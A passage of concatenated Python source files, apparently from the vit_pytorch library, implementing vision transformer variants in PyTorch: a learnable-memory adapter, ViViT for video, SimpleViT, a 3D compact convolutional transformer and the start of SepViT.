self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) return self.mlp_head(x[:, 0]) File: vit_pytorch/learnable_memory_vit.py import torch from torch import nn import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # controlling freezing of layers def set_module_requires_grad_(module, requires_grad): for param in module.parameters(): param.requires_grad = requires_grad def freeze_all_layers_(module): set_module_requires_grad_(module, False) def unfreeze_all_layers_(module): set_module_requires_grad_(module, True) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, attn_mask = None, memories = None): x = self.norm(x) x_kv = x # input for key / values projection if exists(memories): # add memories to key / values if it is passed in memories = repeat(memories, 'n d -> 
b n d', b = x.shape[0]) if memories.ndim == 2 else memories x_kv = torch.cat((x_kv, memories), dim = 1) qkv = (self.to_q(x), *self.to_kv(x_kv).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale if exists(attn_mask): dots = dots.masked_fill(~attn_mask, -torch.finfo(dots.dtype).max) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x, attn_mask = None, memories = None): for ind, (attn, ff) in enumerate(self.layers): layer_memories = memories[ind] if exists(memories) else None x = attn(x, attn_mask = attn_mask, memories = layer_memories) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def img_to_tokens(self, img): x = self.to_patch_embedding(img) cls_tokens = repeat(self.cls_token, '1 n d -> b n d', b = x.shape[0]) x = torch.cat((cls_tokens, x), dim = 1) x += self.pos_embedding x = self.dropout(x) return x def forward(self, img): x = self.img_to_tokens(img) x = self.transformer(x) cls_tokens = x[:, 0] return self.mlp_head(cls_tokens) # adapter with learnable memories per layer, memory CLS token, and learnable adapter head class Adapter(nn.Module): def __init__( self, *, vit, num_memories_per_layer = 10, num_classes = 2, ): super().__init__() assert isinstance(vit, ViT) # extract some model variables needed dim = vit.cls_token.shape[-1] layers = len(vit.transformer.layers) num_patches = vit.pos_embedding.shape[-2] self.vit = vit # freeze ViT backbone - only memories will be finetuned freeze_all_layers_(vit) # learnable parameters self.memory_cls_token = nn.Parameter(torch.randn(dim)) self.memories_per_layer = nn.Parameter(torch.randn(layers, num_memories_per_layer, dim)) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) # specialized attention mask to preserve the output of the original ViT # it allows the memory CLS token to attend to all other tokens (and the learnable memory layer 
tokens), but not vice versa attn_mask = torch.ones((num_patches, num_patches), dtype = torch.bool) attn_mask = F.pad(attn_mask, (1, num_memories_per_layer), value = False) # main tokens cannot attend to learnable memories per layer attn_mask = F.pad(attn_mask, (0, 0, 1, 0), value = True) # memory CLS token can attend to everything self.register_buffer('attn_mask', attn_mask) def forward(self, img): b = img.shape[0] tokens = self.vit.img_to_tokens(img) # add task specific memory tokens memory_cls_tokens = repeat(self.memory_cls_token, 'd -> b 1 d', b = b) tokens = torch.cat((memory_cls_tokens, tokens), dim = 1) # pass memories along with image tokens through transformer for attending out = self.vit.transformer(tokens, memories = self.memories_per_layer, attn_mask = self.attn_mask) # extract memory CLS tokens memory_cls_tokens = out[:, 0] # pass through task specific adapter head return self.mlp_head(memory_cls_tokens) File: vit_pytorch/vivit.py import torch from torch import nn from einops import rearrange, repeat, reduce from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class FactorizedTransformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): b, f, n, _ = x.shape for spatial_attn, temporal_attn, ff in self.layers: x = rearrange(x, 'b f n d -> (b f) n d') x = spatial_attn(x) + x x = rearrange(x, '(b f) n d -> (b n) f d', b=b, f=f) x = temporal_attn(x) + x x = ff(x) + x x = rearrange(x, '(b n) f d 
-> b f n d', b=b, n=n) return self.norm(x) class ViT(nn.Module): def __init__( self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, spatial_depth, temporal_depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., variant = 'factorized_encoder', ): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by frame patch size' assert variant in ('factorized_encoder', 'factorized_self_attention'), f'variant = {variant} is not implemented' num_image_patches = (image_height // patch_height) * (image_width // patch_width) num_frame_patches = (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.global_average_pool = pool == 'mean' self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f (h w) (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_frame_patches, num_image_patches, dim)) self.dropout = nn.Dropout(emb_dropout) self.spatial_cls_token = nn.Parameter(torch.randn(1, 1, dim)) if not self.global_average_pool else None if variant == 'factorized_encoder': self.temporal_cls_token = nn.Parameter(torch.randn(1, 1, dim)) if not self.global_average_pool else None self.spatial_transformer = Transformer(dim, spatial_depth, heads, dim_head, mlp_dim, dropout) self.temporal_transformer = Transformer(dim, temporal_depth, heads, dim_head, mlp_dim, dropout) elif variant == 'factorized_self_attention': assert spatial_depth == temporal_depth, 'Spatial and temporal depth must be the same for factorized self-attention' self.factorized_transformer = FactorizedTransformer(dim, spatial_depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) self.variant = variant def forward(self, video): x = self.to_patch_embedding(video) b, f, n, _ = x.shape x = x + self.pos_embedding[:, :f, :n] if exists(self.spatial_cls_token): spatial_cls_tokens = repeat(self.spatial_cls_token, '1 1 d -> b f 1 d', b = b, f = f) x = torch.cat((spatial_cls_tokens, x), dim = 2) x = self.dropout(x) if self.variant == 'factorized_encoder': x = rearrange(x, 'b f n d -> (b f) n d') # attend across space x = self.spatial_transformer(x) x = rearrange(x, '(b f) n d -> b f n d', b = b) # excise out the spatial cls tokens or average pool for temporal attention x = x[:, :, 0] if not self.global_average_pool else reduce(x, 'b f n d -> b f d', 'mean') # append temporal CLS tokens if exists(self.temporal_cls_token): temporal_cls_tokens = repeat(self.temporal_cls_token, '1 1 d-> b 1 d', b = b) x = torch.cat((temporal_cls_tokens, x), dim = 1) # attend across time x = self.temporal_transformer(x) # excise out temporal cls token or average pool x = x[:, 0] if not self.global_average_pool else reduce(x, 'b f d -> b d', 'mean') elif self.variant == 'factorized_self_attention': x = self.factorized_transformer(x) x = x[:, 0, 0] if not self.global_average_pool else reduce(x, 'b f n d -> b d', 'mean') x = self.to_latent(x) return self.mlp_head(x) File: 
vit_pytorch/simple_vit.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
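        # Simplified ViT: fixed (non-learned) 2D sin-cos positional embedding, no CLS token,
        # no dropout, and mean pooling over patch tokens before the linear classification head.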
patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): device = img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/cct_3d.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # CCT Models __all__ = ['cct_2', 'cct_4', 'cct_6', 'cct_7', 'cct_8', 'cct_14', 'cct_16'] def cct_2(*args, **kwargs): return _cct(num_layers=2, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_4(*args, **kwargs): return _cct(num_layers=4, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_6(*args, **kwargs): return _cct(num_layers=6, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_7(*args, **kwargs): return _cct(num_layers=7, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_8(*args, **kwargs): return _cct(num_layers=8, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_14(*args, **kwargs): return _cct(num_layers=14, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def cct_16(*args, **kwargs): return _cct(num_layers=16, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def _cct(num_layers, num_heads, mlp_ratio, embedding_dim, kernel_size=3, stride=None, padding=None, *args, **kwargs): stride = default(stride, max(1, (kernel_size // 2) - 1)) padding = default(padding, max(1, (kernel_size // 2))) return CCT(num_layers=num_layers, num_heads=num_heads, mlp_ratio=mlp_ratio, embedding_dim=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, *args, **kwargs) # positional def sinusoidal_embedding(n_channels, dim): pe = torch.FloatTensor([[p / (10000 ** (2 * (i // 2) / dim)) for i in range(dim)] for p in range(n_channels)]) pe[:, 0::2] = torch.sin(pe[:, 0::2]) pe[:, 1::2] = torch.cos(pe[:, 1::2]) return rearrange(pe, '... 
-> 1 ...') # modules class Attention(nn.Module): def __init__(self, dim, num_heads=8, attention_dropout=0.1, projection_dropout=0.1): super().__init__() self.heads = num_heads head_dim = dim // self.heads self.scale = head_dim ** -0.5 self.qkv = nn.Linear(dim, dim * 3, bias=False) self.attn_drop = nn.Dropout(attention_dropout) self.proj = nn.Linear(dim, dim) self.proj_drop = nn.Dropout(projection_dropout) def forward(self, x): B, N, C = x.shape qkv = self.qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = q * self.scale attn = einsum('b h i d, b h j d -> b h i j', q, k) attn = attn.softmax(dim=-1) attn = self.attn_drop(attn) x = einsum('b h i j, b h j d -> b h i d', attn, v) x = rearrange(x, 'b h n d -> b n (h d)') return self.proj_drop(self.proj(x)) class TransformerEncoderLayer(nn.Module): """ Inspired by torch.nn.TransformerEncoderLayer and rwightman's timm package. """ def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, attention_dropout=0.1, drop_path_rate=0.1): super().__init__() self.pre_norm = nn.LayerNorm(d_model) self.self_attn = Attention(dim=d_model, num_heads=nhead, attention_dropout=attention_dropout, projection_dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout1 = nn.Dropout(dropout) self.norm1 = nn.LayerNorm(d_model) self.linear2 = nn.Linear(dim_feedforward, d_model) self.dropout2 = nn.Dropout(dropout) self.drop_path = DropPath(drop_path_rate) self.activation = F.gelu def forward(self, src, *args, **kwargs): src = src + self.drop_path(self.self_attn(self.pre_norm(src))) src = self.norm1(src) src2 = self.linear2(self.dropout1(self.activation(self.linear1(src)))) src = src + self.drop_path(self.dropout2(src2)) return src class DropPath(nn.Module): def __init__(self, drop_prob=None): super().__init__() self.drop_prob = float(drop_prob) def forward(self, x): batch, drop_prob, device, dtype = x.shape[0], self.drop_prob, x.device, x.dtype if drop_prob <= 0. 
or not self.training: return x keep_prob = 1 - self.drop_prob shape = (batch, *((1,) * (x.ndim - 1))) keep_mask = torch.zeros(shape, device = device).float().uniform_(0, 1) < keep_prob output = x.div(keep_prob) * keep_mask.float() return output class Tokenizer(nn.Module): def __init__( self, frame_kernel_size, kernel_size, stride, padding, frame_stride=1, frame_pooling_stride=1, frame_pooling_kernel_size=1, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, n_conv_layers=1, n_input_channels=3, n_output_channels=64, in_planes=64, activation=None, max_pool=True, conv_bias=False ): super().__init__() n_filter_list = [n_input_channels] + \ [in_planes for _ in range(n_conv_layers - 1)] + \ [n_output_channels] n_filter_list_pairs = zip(n_filter_list[:-1], n_filter_list[1:]) self.conv_layers = nn.Sequential( *[nn.Sequential( nn.Conv3d(chan_in, chan_out, kernel_size=(frame_kernel_size, kernel_size, kernel_size), stride=(frame_stride, stride, stride), padding=(frame_kernel_size // 2, padding, padding), bias=conv_bias), nn.Identity() if not exists(activation) else activation(), nn.MaxPool3d(kernel_size=(frame_pooling_kernel_size, pooling_kernel_size, pooling_kernel_size), stride=(frame_pooling_stride, pooling_stride, pooling_stride), padding=(frame_pooling_kernel_size // 2, pooling_padding, pooling_padding)) if max_pool else nn.Identity() ) for chan_in, chan_out in n_filter_list_pairs ]) self.apply(self.init_weight) def sequence_length(self, n_channels=3, frames=8, height=224, width=224): return self.forward(torch.zeros((1, n_channels, frames, height, width))).shape[1] def forward(self, x): x = self.conv_layers(x) return rearrange(x, 'b c f h w -> b (f h w) c') @staticmethod def init_weight(m): if isinstance(m, nn.Conv3d): nn.init.kaiming_normal_(m.weight) class TransformerClassifier(nn.Module): def __init__( self, seq_pool=True, embedding_dim=768, num_layers=12, num_heads=12, mlp_ratio=4.0, num_classes=1000, dropout_rate=0.1, attention_dropout=0.1, stochastic_depth_rate=0.1, positional_embedding='sine', sequence_length=None, *args, **kwargs ): super().__init__() assert positional_embedding in {'sine', 'learnable', 'none'} dim_feedforward = int(embedding_dim * mlp_ratio) self.embedding_dim = embedding_dim self.sequence_length = sequence_length self.seq_pool = seq_pool assert exists(sequence_length) or positional_embedding == 'none', \ f"Positional embedding is set to {positional_embedding} and" \ f" the sequence length was not specified." 
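        # With seq_pool, the output sequence is pooled by learned attention weights (attention_pool below);
        # otherwise a learnable class token is prepended and used for classification.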
if not seq_pool: sequence_length += 1 self.class_emb = nn.Parameter(torch.zeros(1, 1, self.embedding_dim)) else: self.attention_pool = nn.Linear(self.embedding_dim, 1) if positional_embedding == 'none': self.positional_emb = None elif positional_embedding == 'learnable': self.positional_emb = nn.Parameter(torch.zeros(1, sequence_length, embedding_dim)) nn.init.trunc_normal_(self.positional_emb, std = 0.2) else: self.register_buffer('positional_emb', sinusoidal_embedding(sequence_length, embedding_dim)) self.dropout = nn.Dropout(p=dropout_rate) dpr = [x.item() for x in torch.linspace(0, stochastic_depth_rate, num_layers)] self.blocks = nn.ModuleList([ TransformerEncoderLayer(d_model=embedding_dim, nhead=num_heads, dim_feedforward=dim_feedforward, dropout=dropout_rate, attention_dropout=attention_dropout, drop_path_rate=layer_dpr) for layer_dpr in dpr]) self.norm = nn.LayerNorm(embedding_dim) self.fc = nn.Linear(embedding_dim, num_classes) self.apply(self.init_weight) @staticmethod def init_weight(m): if isinstance(m, nn.Linear): nn.init.trunc_normal_(m.weight, std=.02) if isinstance(m, nn.Linear) and exists(m.bias): nn.init.constant_(m.bias, 0) elif isinstance(m, nn.LayerNorm): nn.init.constant_(m.bias, 0) nn.init.constant_(m.weight, 1.0) def forward(self, x): b = x.shape[0] if not exists(self.positional_emb) and x.size(1) < self.sequence_length: x = F.pad(x, (0, 0, 0, self.n_channels - x.size(1)), mode='constant', value=0) if not self.seq_pool: cls_token = repeat(self.class_emb, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_token, x), dim=1) if exists(self.positional_emb): x += self.positional_emb x = self.dropout(x) for blk in self.blocks: x = blk(x) x = self.norm(x) if self.seq_pool: attn_weights = rearrange(self.attention_pool(x), 'b n 1 -> b n') x = einsum('b n, b n d -> b d', attn_weights.softmax(dim = 1), x) else: x = x[:, 0] return self.fc(x) # CCT Main model class CCT(nn.Module): def __init__( self, img_size=224, num_frames=8, embedding_dim=768, n_input_channels=3, n_conv_layers=1, frame_stride=1, frame_kernel_size=3, frame_pooling_kernel_size=1, frame_pooling_stride=1, kernel_size=7, stride=2, padding=3, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, *args, **kwargs ): super().__init__() img_height, img_width = pair(img_size) self.tokenizer = Tokenizer( n_input_channels=n_input_channels, n_output_channels=embedding_dim, frame_stride=frame_stride, frame_kernel_size=frame_kernel_size, frame_pooling_stride=frame_pooling_stride, frame_pooling_kernel_size=frame_pooling_kernel_size, kernel_size=kernel_size, stride=stride, padding=padding, pooling_kernel_size=pooling_kernel_size, pooling_stride=pooling_stride, pooling_padding=pooling_padding, max_pool=True, activation=nn.ReLU, n_conv_layers=n_conv_layers, conv_bias=False ) self.classifier = TransformerClassifier( sequence_length=self.tokenizer.sequence_length( n_channels=n_input_channels, frames=num_frames, height=img_height, width=img_width ), embedding_dim=embedding_dim, seq_pool=True, dropout_rate=0., attention_dropout=0.1, stochastic_depth=0.1, *args, **kwargs ) def forward(self, x): x = self.tokenizer(x) return self.classifier(x) File: vit_pytorch/sep_vit.py from functools import partial import torch from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class ChanLayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() 
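        # LayerNorm over the channel dimension of (b, c, h, w) feature maps,
        # with learnable per-channel scale `g` and bias `b`.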
self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class OverlappingPatchEmbed(nn.Module): def __init__(self, dim_in, dim_out, stride = 2): super().__init__() kernel_size = stride * 2 - 1 padding = kernel_size // 2 self.conv = nn.Conv2d(dim_in, dim_out, kernel_size, stride = stride, padding = padding) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # feedforward class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() inner_dim = int(dim * mult) self.net = nn.Sequential( ChanLayerNorm(dim), nn.Conv2d(dim, inner_dim, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class DSSA(nn.Module): def __init__( self, dim, heads = 8, dim_head = 32, dropout = 0., window_size = 7 ): super().__init__() self.heads = heads self.scale = dim_head ** -0.5 self.window_size = window_size inner_dim = dim_head * heads self.norm = ChanLayerNorm(dim) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_qkv = nn.Conv1d(dim, inner_dim * 3, 1, bias = False) # window tokens self.window_tokens = nn.Parameter(torch.randn(dim)) # prenorm and non-linearity for window tokens # then projection to queries and keys for window tokens self.window_tokens_to_qk = nn.Sequential( nn.LayerNorm(dim_head), nn.GELU(), Rearrange('b h n c -> b (h c) n'), nn.Conv1d(inner_dim, inner_dim * 2, 1), Rearrange('b (h c) n -> b h n c', h = heads), ) # window attention self.window_attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): """ einstein notation b - batch c - channels w1 - window size (height) w2 - also window size (width) i - sequence dimension (source) j - sequence dimension (target dimension to be reduced) h - heads x - height of feature map divided by window size y - width of feature map divided by window size """ batch, height, width, heads, wsz = x.shape[0], *x.shape[-2:], self.heads, self.window_size assert (height % wsz) == 0 and (width % wsz) == 0, f'height {height} and width {width} must be divisible by window size {wsz}' num_windows = (height // wsz) * (width // wsz) x = self.norm(x) # fold in windows for "depthwise" attention - not sure why it is named depthwise when it is just "windowed" attention x = rearrange(x, 'b c (h w1) (w w2) -> (b h w) c (w1 w2)', w1 = wsz, w2 = wsz) # add windowing tokens w = repeat(self.window_tokens, 'c -> b c 1', b = x.shape[0]) x = torch.cat((w, x), dim = -1) # project for queries, keys, value q, k, v = self.to_qkv(x).chunk(3, dim = 1) # split out heads q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) 
d', h = heads), (q, k, v)) # scale q = q * self.scale # similarity dots = einsum('b h i d, b h j d -> b h i j', q, k) # attention attn = self.attend(dots) # aggregate values out = torch.matmul(attn, v) # split out windowed tokens window_tokens, windowed_fmaps = out[:, :, 0], out[:, :, 1:] # early return if there is only 1 window if num_windows == 1: fmap = rearrange(windowed_fmaps, '(b x y) h (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz, y = width // wsz, w1 = wsz, w2 = wsz) return self.to_out(fmap) # carry out the pointwise attention, the main novelty in the paper window_tokens = rearrange(window_tokens, '(b x y) h d -> b h (x y) d', x = height // wsz, y = width // wsz) windowed_fmaps = rearrange(windowed_fmaps, '(b x y) h n d -> b h (x y) n d', x = height // wsz, y = width // wsz) # windowed queries and keys (preceded by prenorm activation) w_q, w_k = self.window_tokens_to_qk(window_tokens).chunk(2, dim = -1) # scale w_q = w_q * self.scale # similarities w_dots = einsum('b h i d, b h j d -> b h i j', w_q, w_k) w_attn = self.window_attend(w_dots) # aggregate the feature maps from the "depthwise" attention step (the most interesting part of the paper, one i haven't seen before) aggregated_windowed_fmap = einsum('b h i j, b h j w d -> b h i w d', w_attn, windowed_fmaps) # fold back the windows and then combine heads for aggregation fmap = rearrange(aggregated_windowed_fmap, 'b h (x y) (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz, y = width // wsz, w1 = wsz, w2 = wsz) return self.to_out(fmap) class Transformer(nn.Module): def __init__( self, dim, depth, dim_head = 32, heads = 8, ff_mult = 4, dropout = 0., norm_output = True ): super().__init__() self.layers = nn.ModuleList([]) for ind in range(depth): self.layers.append(nn.ModuleList([ DSSA(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mult = ff_mult, dropout = dropout), ])) self.norm = ChanLayerNorm(dim) if norm_output else nn.Identity() def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SepViT(nn.Module): def __init__( self, *, num_classes, dim, depth, heads, window_size = 7, dim_head = 32, ff_mult = 4, channels = 3, dropout = 0. 
